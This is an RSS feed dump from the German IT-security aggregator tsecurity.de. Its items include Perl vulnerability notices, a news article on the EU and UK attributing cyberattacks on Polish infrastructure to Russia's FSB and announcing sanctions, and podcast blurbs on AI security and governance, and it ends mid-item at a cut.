<pubDate>Tue, 14 Jul 2026 14:26:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/perl">Perl up to 5.43.10</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects some unknown processing of the component <em>S_measure_struct</em>. Executing a manipulation of the argument <em>repeat</em> can lead to integer overflow.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-57432">CVE-2026-57432</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Perl: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Perl ausnutzen, um einen Denial of Service Angriff durchzuführen oder vertrauliche Informationen offenzulegen.]]></description>
<link>https://tsecurity.de/de/3667676/it-security-nachrichten/neu-mittel-perl-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667676/it-security-nachrichten/neu-mittel-perl-mehrere-schwachstellen/</guid>
<pubDate>Tue, 14 Jul 2026 12:54:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Perl ausnutzen, um einen Denial of Service Angriff durchzuführen oder vertrauliche Informationen offenzulegen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Interview: Lucie Audibert, solicitor in MP Jess Asato’s Grok case]]></title>
<description><![CDATA[AWO solicitor Lucie Audibert speaks with Computer Weekly about representing Labour MP Jess Asato’s legal claim against xAI’s chatbot Grok, its nudification capabilities and how this case may define what liability for developers of AI tools look like]]></description>
<link>https://tsecurity.de/de/3667638/it-nachrichten/interview-lucie-audibert-solicitor-in-mp-jess-asatos-grok-case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667638/it-nachrichten/interview-lucie-audibert-solicitor-in-mp-jess-asatos-grok-case/</guid>
<pubDate>Tue, 14 Jul 2026 12:32:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AWO solicitor Lucie Audibert speaks with Computer Weekly about representing Labour MP Jess Asato’s legal claim against xAI’s chatbot Grok, its nudification capabilities and how this case may define what liability for developers of AI tools look like]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Weekly Roundup: AWS Builder Center at 1 year, Network Scanning in Security Hub, Loom for AWS, and more (July 13, 2026)]]></title>
<description><![CDATA[AWS Builder Center turned one year old last week. Launched on July 9, 2025, the platform has grown from a community hub with Wishlist voting, community profiles, and a toolbox into a full ecosystem with sandbox environments, workshops, Spaces, and a Builders’ Library. To mark the anniversary, Ric...]]></description>
<link>https://tsecurity.de/de/3667461/ai-nachrichten/aws-weekly-roundup-aws-builder-center-at-1-year-network-scanning-in-security-hub-loom-for-aws-and-more-july-13-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667461/ai-nachrichten/aws-weekly-roundup-aws-builder-center-at-1-year-network-scanning-in-security-hub-loom-for-aws-and-more-july-13-2026/</guid>
<pubDate>Tue, 14 Jul 2026 11:33:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AWS Builder Center turned one year old last week. Launched on July 9, 2025, the platform has grown from a community hub with Wishlist voting, community profiles, and a toolbox into a full ecosystem with sandbox environments, workshops, Spaces, and a Builders’ Library. To mark the anniversary, Rick Suttles published a full feature timeline covering […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Discovering & Securing Your AI Agent Attack Surface - Jeremy Snyder - ASW #391]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 While LLMs and agents are new to appsec and everyone else, a lot of AI security requirements translate to well-known API security requirements. Jeremy Snyder helps us frame the OWASP LLM Top 10 into five layers in order to help or...]]></description>
<link>https://tsecurity.de/de/3667423/it-security-video/discovering-securing-your-ai-agent-attack-surface-jeremy-snyder-asw-391/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667423/it-security-video/discovering-securing-your-ai-agent-attack-surface-jeremy-snyder-asw-391/</guid>
<pubDate>Tue, 14 Jul 2026 11:17:29 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/a06cHj2UCU4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>While LLMs and agents are new to appsec and everyone else, a lot of AI security requirements translate to well-known API security requirements. Jeremy Snyder helps us frame the OWASP LLM Top 10 into five layers in order to help orgs understand and prioritize their attack surface. <br />
<br />
A lot of orgs don't have to deal with model-specific threats or building their own GPU architecture, but every org adopting LLMs and agents should be aware of how those agents are being invoked and the output those agents are producing. That awareness of input and output helps in identifying and mitigating prompt injection attacks, ensuring agents are working within their expected boundaries, and taming token budgets.<br />
<br />
Resources:<br />
- https://genai.owasp.org/llm-top-10/<br />
- https://github.com/rtk-ai/rtk<br />
- https://docs.aws.amazon.com/bedrock/latest/userguide/prompt-caching.html<br />
- https://www.firetail.ai/blog/beyond-the-spectacle-rsac-2026-and-the-5-layers-of-ai-security<br />
<br />
Visit https://www.securityweekly.com/asw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/asw-391<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[EU, UK Attribute Russia Cyberattack to FSB, Announce Sanctions]]></title>
<description><![CDATA[The Russia cyberattack targeting Poland's critical infrastructure has been formally attributed to Russia's Federal Security Service (FSB), with the European Union and the United Kingdom announcing a coordinated package of cyber sanctions against Russian-linked hackers and organizations. The move ...]]></description>
<link>https://tsecurity.de/de/3666927/it-security-nachrichten/eu-uk-attribute-russia-cyberattack-to-fsb-announce-sanctions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666927/it-security-nachrichten/eu-uk-attribute-russia-cyberattack-to-fsb-announce-sanctions/</guid>
<pubDate>Tue, 14 Jul 2026 07:38:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Russia cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Russia-cyberattack-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="EU, UK Attribute Russia Cyberattack to FSB, Announce Sanctions 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="401" data-end="873">The Russia cyberattack targeting Poland's critical infrastructure has been formally attributed to Russia's Federal Security Service (FSB), with the <a href="https://thecyberexpress.com/europe-union-tightens-cybersecurity-grip/" target="_blank" rel="noopener">European Union</a> and the United Kingdom announcing a coordinated package of cyber sanctions against <a href="https://thecyberexpress.com/russia-targeting-cisco-network-gear/" target="_blank" rel="noopener">Russian-linked hackers</a> and organizations. The move follows an attempted disruption of Poland's energy sector last winter that officials said came close to triggering a major blackout affecting nearly half a million people.</p>
<p data-start="875" data-end="1258">According to statements released by the EU and UK on Monday, the FSB's Center 16 was responsible for attempted <a href="https://thecyberexpress.com/tce-weekly-roundup-global-threats-ai-risks/" target="_blank" rel="noopener">cyber sabotage</a> against Poland's heating and power infrastructure, as well as cyber intrusions targeting water treatment facilities. The allies also accused the agency of conducting broader <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28947">cyber</a> operations against governments and critical infrastructure across Europe.</p>

<h3 data-section-id="1ojdcbi" data-start="1260" data-end="1322"><span role="text"><strong data-start="1263" data-end="1322">Russia Cyberattack Linked to FSB's Center 16 Operations</strong></span></h3>
<p data-start="1324" data-end="1762">The European Union <a href="https://www.consilium.europa.eu/en/press/press-releases/2026/07/13/cyber-russia-statement-by-the-high-representative-on-behalf-of-the-european-union-denouncing-russia-s-malicious-cyber-ecosystem-targeting-the-eu-its-member-states-and-international-partners/" target="_blank" rel="nofollow noopener">said</a> Center 16, the signals intelligence arm of the FSB, has conducted malicious cyber activities affecting multiple member states and international partners. According to the bloc, these operations have included infiltration of government networks, cyber espionage, and sabotage targeting <a href="https://thecyberexpress.com/ci-fortify-targets-critical-infrastructure/" target="_blank" rel="noopener">critical infrastructure </a>in France, Germany, Poland, Cyprus, the Netherlands, Austria, Slovakia, Romania, and Finland.</p>
<p data-start="1764" data-end="2152">The EU also stated that Center 16 controls several cyber threat groups, including TURLA, and has been involved in cyber operations against strategic government entities in France since 2010 and the country's defense industry in 2025. In Germany, it allegedly targeted government institutions, while in Poland it carried out disruptive operations against combined heating and power plants.</p>
<p data-start="2154" data-end="2342">British authorities <a href="https://www.gov.uk/government/news/uk-and-eu-strike-russian-cyber-networks-with-new-sanctions" target="_blank" rel="nofollow noopener">described</a> last December's attempted attack on Poland's energy grid as "reckless," saying it was another example of Russia's attempts to create disruption across Europe.</p>

<h3 data-section-id="1xky3g3" data-start="2344" data-end="2396"><span role="text"><strong data-start="2347" data-end="2396">Poland Attack Nearly Triggered Major Blackout</strong></span></h3>
<p data-start="2398" data-end="2612">The <a href="https://thecyberexpress.com/poland-cyberattack-energy-grid-blackout/" target="_blank" rel="noopener">cyber incident targeting Poland's energy infrastructure</a> last winter was initially linked by cybersecurity firms ESET and Dragos to Sandworm, a threat group associated with Russia's military intelligence agency.</p>
<p data-start="2614" data-end="2802">However, Poland's national cybersecurity agency, <a href="https://thecyberexpress.com/default-credentials-polish-energy-grid-attack/" target="_blank" rel="noopener">CERT Polska</a>, later disputed that assessment after tracing the attack infrastructure and connecting it to a cluster associated with the FSB.</p>
<p data-start="2804" data-end="2996">Separately, Poland's domestic intelligence service <a href="https://www.abw.gov.pl/pl/aktualnosci/2815,Agencja-Bezpieczenstwa-Wewnetrznego-2024-2025-Wybrane-aktywnosci.html" target="_blank" rel="nofollow noopener">warned in May</a> that cyber intrusions targeting the country's water treatment facilities posed a direct risk to the continuity of water supply.</p>

<h3 data-section-id="1k2aqc9" data-start="2998" data-end="3037"><span role="text"><strong data-start="3001" data-end="3037">EU and UK Expand Cyber Sanctions</strong></span></h3>
<p data-start="3039" data-end="3350">In response, the European Union imposed restrictive measures on nine individuals and four entities linked to Russia's cyber ecosystem. The sanctions target intelligence officers, cybercriminals, self-proclaimed hacktivists, and private companies accused of supporting or facilitating malicious cyber operations.</p>
<p data-start="3352" data-end="3656">The wider sanctions package announced by European partners targets more than 30 individuals and organizations, including operators behind the Lumma Stealer <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28948">malware</a>, companies accused of recruiting hackers from Russian universities, and individuals associated with the pro-Kremlin Rybar military blog.</p>
<p data-start="3658" data-end="3877">EU foreign policy chief Kaja Kallas <a href="https://www.eeas.europa.eu/eeas/foreign-affairs-council-remarks-high-representative-kaja-kallas-press-conference-2_en" target="_blank" rel="nofollow noopener">said</a> Russia continues to rely on intelligence agencies, cybercriminal groups, hacktivists, and private companies to conduct malicious cyber operations against Europe and its partners.</p>
<p data-start="3879" data-end="4083">She added that the bloc strongly condemns the misuse of this cyber ecosystem, which has targeted public services and critical infrastructure, resulting in operational disruptions and financial losses.</p>

<h3 data-section-id="aubtqe" data-start="4085" data-end="4121"><span role="text"><strong data-start="4088" data-end="4121">France Details FSB Activities</strong></span></h3>
<p data-start="4123" data-end="4311">France also a<a href="https://www.diplomatie.gouv.fr/en/presse-et-ressources/decouvrir-et-informer/actualites/attribution-a-la-russie-d-activites-cyber-malveillantes-a-des-fins-d-espionnage-en-france" target="_blank" rel="nofollow noopener">nnounced</a> additional sanctions and said it would summon the Russian ambassador over what it described as persistent malicious cyber activities conducted for espionage purposes.</p>
<p data-start="4313" data-end="4523">A <a href="https://www.cert.ssi.gouv.fr/cti/CERTFR-2026-CTI-005/" target="_blank" rel="nofollow noopener">technical report</a> from France's Cyber Crisis Coordination Center (C4) identified 11 interception centers operated by Center 16 across Russia, including Unit 61240, which it said specifically focused on France.</p>
<p data-start="4525" data-end="4792">French authorities alleged that the unit targeted government ministry systems in 2014, compromised the French Embassy network in Moscow in 2018, and stole significant volumes of <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28949">data</a> from a research institute working with the French defense industry in February 2025.</p>
<p data-start="4794" data-end="4954">France also stated that one newly sanctioned group had claimed responsibility for destabilization efforts targeting the <a href="https://thecyberexpress.com/russian-government-2024-paris-olympics-games/" target="_blank" rel="noopener">2024 Paris Olympic</a> and Paralympic Games.</p>

<h3 data-section-id="1wps0k5" data-start="4956" data-end="5003"><span role="text"><strong data-start="4959" data-end="5003">Allied Advisory Warns of Ongoing Threats</strong></span></h3>
<p data-start="5005" data-end="5283">Alongside the sanctions, the United States and intelligence agencies from a dozen allied countries published a <a href="https://media.defense.gov/2026/Jul/09/2003959498/-1/-1/1/CSA_IMPROVE_ROUTER_HYGIENE.PDF" target="_blank" rel="nofollow noopener">joint cybersecurity advisory</a> warning that Russian operators linked to Center 16 have been scanning internet-connected devices protected by weak or default credentials.</p>
<p data-start="5285" data-end="5731">The United Kingdom separately <a href="https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/" target="_blank" rel="nofollow noopener">sanctioned</a> individuals connected to Lumma Stealer, describing it as one of the world's most widely used information-stealing malware families. British officials said credentials stolen through the <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noopener" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28950">malware</a> have been used to support Russian espionage operations globally. According to the UK's National <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28946">Crime</a> Agency, more than 2,100 victims in the country were infected by Lumma Stealer during the past six months.</p>
<p data-start="5733" data-end="5994">British Foreign Secretary Yvette Cooper said the sanctions are intended to disrupt the cybercriminal ecosystem supporting Moscow's intelligence services, while emphasizing that the coordinated measures send a clear message against the use of proxy cyber groups.</p>
<p data-start="5996" data-end="6250">The Kremlin has repeatedly denied conducting offensive cyber operations. Russian President Vladimir Putin has <a href="https://ria.ru/20260604/putin-2096920826.html" target="_blank" rel="nofollow noopener">dismissed European allegations</a> of sabotage and cyberattacks as baseless, saying they are intended to justify aggressive policies against Russia.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[/r/ReverseEngineering's Weekly Questions Thread]]></title>
<description><![CDATA[To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have ...]]></description>
<link>https://tsecurity.de/de/3666728/reverse-engineering/rreverseengineerings-weekly-questions-thread/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666728/reverse-engineering/rreverseengineerings-weekly-questions-thread/</guid>
<pubDate>Tue, 14 Jul 2026 04:54:01 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the <a href="http://reverseengineering.stackexchange.com/">Reverse Engineering StackExchange</a>. See also <a href="https://www.reddit.com/r/AskReverseEngineering">/r/AskReverseEngineering</a>.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/AutoModerator"> /u/AutoModerator </a> <br> <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1uv43y3/rreverseengineerings_weekly_questions_thread/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1uv43y3/rreverseengineerings_weekly_questions_thread/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen beliebiger Kommandos in perl-DBI (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3666353/unix-server/security-ausfuehren-beliebiger-kommandos-in-perl-dbi-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666353/unix-server/security-ausfuehren-beliebiger-kommandos-in-perl-dbi-red-hat/</guid>
<pubDate>Mon, 13 Jul 2026 22:16:53 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in perl-DBI (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3666320/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-perl-dbi-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666320/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-perl-dbi-red-hat/</guid>
<pubDate>Mon, 13 Jul 2026 22:08:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in perl-DBI (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3666319/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-perl-dbi-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666319/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-perl-dbi-red-hat/</guid>
<pubDate>Mon, 13 Jul 2026 22:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Open earbuds let you tune in without tuning out the world. Here are the five best pairs]]></title>
<description><![CDATA[Don’t float through the world in an AirPod bubble – enjoy music or podcasts and carry on using these tested favoritesI tested 42 pairs of wireless earbuds to find the best in USSign up for the Filter US newsletter, your weekly guide to buying fewer, better thingsIn a feat of engineering that bord...]]></description>
<link>https://tsecurity.de/de/3666263/it-nachrichten/open-earbuds-let-you-tune-in-without-tuning-out-the-world-here-are-the-five-best-pairs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666263/it-nachrichten/open-earbuds-let-you-tune-in-without-tuning-out-the-world-here-are-the-five-best-pairs/</guid>
<pubDate>Mon, 13 Jul 2026 21:32:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Don’t float through the world in an AirPod bubble – enjoy music or podcasts and carry on using these tested favorites</p><ul><li><p><a href="https://www.theguardian.com/thefilter-us/2026/apr/24/best-wireless-earbuds">I tested 42 pairs of wireless earbuds to find the best in US</a></p></li><li><p><a href="https://www.theguardian.com/global/2025/sep/09/sign-up-to-the-filter-us-our-newsletter-guide-to-buying-fewer-better-products">Sign up for the Filter US newsletter, your weekly guide to buying fewer, better things</a></p></li></ul><p>In a feat of engineering that borders on magic, the <a href="https://www.theguardian.com/thefilter-us/2026/apr/24/best-wireless-earbuds">best wireless earbuds</a> can silence the noisy world around you at the tap of a finger. So, why would you buy open earbuds, which are specifically designed to let <em>in</em> environmental sounds?</p><p>Frankly, I didn’t understand the appeal of them either until I started testing them, and now I use open earbuds even more than my noise-cancelling earbuds. For situations from <a href="https://www.theguardian.com/thefilter-us/2026/jul/04/best-hiking-daypacks-tested-reviewed">hiking</a> to running errands, these are the headphones you should be wearing. Here’s what you’re missing out on, and a few of the best pairs to try.</p><p><strong>Best overall open-ear earbuds:</strong> <br>
 Soundcore Aeroclip Open-Ear Earbuds</p><p><strong>Best premium open-ear earbuds:</strong><br>
 Bose Ultra Open Earbuds</p> <a href="https://www.theguardian.com/thefilter-us/2026/jul/13/best-open-ear-earbuds">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Cannot Govern Alone]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:74 AI can help organizations create stronger policies and improve security decision-making, but current AI systems are not perfectly precise.

Because AI is non-deterministic, security teams still need humans involved in important d...]]></description>
<link>https://tsecurity.de/de/3666238/it-security-video/ai-cannot-govern-alone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666238/it-security-video/ai-cannot-govern-alone/</guid>
<pubDate>Mon, 13 Jul 2026 21:18:47 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:74 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/3O_Jev9SHkE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI can help organizations create stronger policies and improve security decision-making, but current AI systems are not perfectly precise.<br />
<br />
Because AI is non-deterministic, security teams still need humans involved in important decisions. Better outcomes require combining AI capabilities with accurate, real-time information sharing and well-defined policies.<br />
<br />
As AI becomes more embedded in security workflows, where should organizations draw the line between automated decisions and human oversight?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#IdentitySecurity #AISecurity #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What Anthropic’s latest AI discovery does—and doesn’t—show]]></title>
<description><![CDATA[This story originally appeared in The Algorithm, our weekly newsletter on AI. To get stories like this in your inbox first, sign up here. Anthropic—currently the world’s most valuable AI company, with a nearly $1 trillion valuation—has a reputation for publishing strange and heady research. It’s ...]]></description>
<link>https://tsecurity.de/de/3666135/ai-nachrichten/what-anthropics-latest-ai-discovery-does-and-doesnt-show/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666135/ai-nachrichten/what-anthropics-latest-ai-discovery-does-and-doesnt-show/</guid>
<pubDate>Mon, 13 Jul 2026 20:18:30 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This story originally appeared in The Algorithm, our weekly newsletter on AI. To get stories like this in your inbox first, sign up here. Anthropic—currently the world’s most valuable AI company, with a nearly $1 trillion valuation—has a reputation for publishing strange and heady research. It’s looking into whether AI models can feel pain, for example,…]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud Security Meets AI: What CISOs Need to Govern Before They Scale - Brent Neal - CSP #226]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 AI is changing cloud security fast, but the biggest challenge is not just adoption. It is governance.

In this episode, Jess sits down with Brent Neil, CISO at RapidScale, to talk about what CISOs should be watching as AI becomes...]]></description>
<link>https://tsecurity.de/de/3665812/it-security-video/cloud-security-meets-ai-what-cisos-need-to-govern-before-they-scale-brent-neal-csp-226/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665812/it-security-video/cloud-security-meets-ai-what-cisos-need-to-govern-before-they-scale-brent-neal-csp-226/</guid>
<pubDate>Mon, 13 Jul 2026 18:17:51 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/oDDSAX2VtTY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI is changing cloud security fast, but the biggest challenge is not just adoption. It is governance.<br />
<br />
In this episode, Jess sits down with Brent Neil, CISO at RapidScale, to talk about what CISOs should be watching as AI becomes embedded in cloud environments, business workflows, and sensitive data systems. Brent shares practical insight on AI governance, identity and access, cloud security controls, and the risks that emerge when experimentation moves into production.<br />
<br />
The conversation explores how security leaders can support innovation without losing visibility, accountability, or trust. Brent also breaks down the questions CISOs should be asking before AI tools scale deeper into the enterprise.<br />
<br />
Because AI may be unavoidable, but unmanaged AI risk is optional.<br />
<br />
Segment Resources:<br />
RapidScale's IT Talent Gap Report: https://try.rapidscale.net/the-talent-gap/<br />
<br />
This segment is sponsored by Arctic Wolf. Visit https://cisostoriespodcast.com/arcticwolf to learn more about them!<br />
<br />
Show Notes: https://cisostoriespodcast.com/csp-226<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[⚡ Weekly Recap: ShareFile Threat, Citrix Bleed 2 Ransomware, AI Coding Attacks, and More]]></title>
<description><![CDATA[Somewhere right now, a security tool is quietly finding bugs faster than any human can fix them. That’s supposed to be the good news. The catch is that the attackers have the same tools, pointed the other way, and they…
Read more →
The post ⚡ Weekly Recap: ShareFile Threat, Citrix Bleed 2 Ransomw...]]></description>
<link>https://tsecurity.de/de/3665762/it-security-nachrichten/weekly-recap-sharefile-threat-citrix-bleed-2-ransomware-ai-coding-attacks-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665762/it-security-nachrichten/weekly-recap-sharefile-threat-citrix-bleed-2-ransomware-ai-coding-attacks-and-more/</guid>
<pubDate>Mon, 13 Jul 2026 17:35:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Somewhere right now, a security tool is quietly finding bugs faster than any human can fix them. That’s supposed to be the good news. The catch is that the attackers have the same tools, pointed the other way, and they…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/%E2%9A%A1-weekly-recap-sharefile-threat-citrix-bleed-2-ransomware-ai-coding-attacks-and-more/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/%E2%9A%A1-weekly-recap-sharefile-threat-citrix-bleed-2-ransomware-ai-coding-attacks-and-more/">⚡ Weekly Recap: ShareFile Threat, Citrix Bleed 2 Ransomware, AI Coding Attacks, and More</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[⚡ Weekly Recap: ShareFile Threat, Citrix Bleed 2 Ransomware, AI Coding Attacks, and More]]></title>
<description><![CDATA[Somewhere right now, a security tool is quietly finding bugs faster than any human can fix them. That's supposed to be the good news. The catch is that the attackers have the same tools, pointed the other way, and they don't file tickets.

That's the shape of this week. Trusted code turns on the ...]]></description>
<link>https://tsecurity.de/de/3665729/it-security-nachrichten/weekly-recap-sharefile-threat-citrix-bleed-2-ransomware-ai-coding-attacks-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665729/it-security-nachrichten/weekly-recap-sharefile-threat-citrix-bleed-2-ransomware-ai-coding-attacks-and-more/</guid>
<pubDate>Mon, 13 Jul 2026 17:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Somewhere right now, a security tool is quietly finding bugs faster than any human can fix them. That's supposed to be the good news. The catch is that the attackers have the same tools, pointed the other way, and they don't file tickets.

That's the shape of this week. Trusted code turns on the people who installed it. Old bugs from last year are still landing because the fix sat in a queue too]]></content:encoded>
</item>
<item>
<title><![CDATA[Node.js tutorial: Get started with Node]]></title>
<description><![CDATA[Node.js is a popular and versatile cross-platform JavaScript runtime environment. Node was the first runtime to allow developers to run JavaScript outside the browser, opening a new world of possibilities in server-side JavaScript. Its ease of use, massive ecosystem and performance characteristic...]]></description>
<link>https://tsecurity.de/de/3665674/ai-nachrichten/nodejs-tutorial-get-started-with-node/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665674/ai-nachrichten/nodejs-tutorial-get-started-with-node/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:39 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



